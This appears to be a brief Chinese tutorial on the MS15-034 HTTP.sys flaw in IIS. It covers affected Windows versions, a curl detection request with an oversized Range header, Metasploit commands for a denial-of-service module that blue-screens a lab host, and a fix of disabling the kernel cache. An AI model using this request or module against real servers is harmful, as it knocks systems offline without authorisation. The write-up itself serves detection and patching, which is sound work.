1、漏洞介绍
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
影响版本:
安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本
2、漏洞检测
执行curl http://11.1.1.6 -H “Host:11.1.1.6” -H “Range:bytes=0-18446744073709551615” ,返回值如下,说明存在漏扫。
3、漏洞利用
利用metasploit进行ddos攻击
msfconsole
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhost 11.1.1.6
show options
exploit
执行命令后,攻击成功,导致主机蓝屏
4、修复建议
禁用IIS内核缓存(可能降低IIS性能),此时再次测试,无法造成目标蓝屏
禁用内核缓存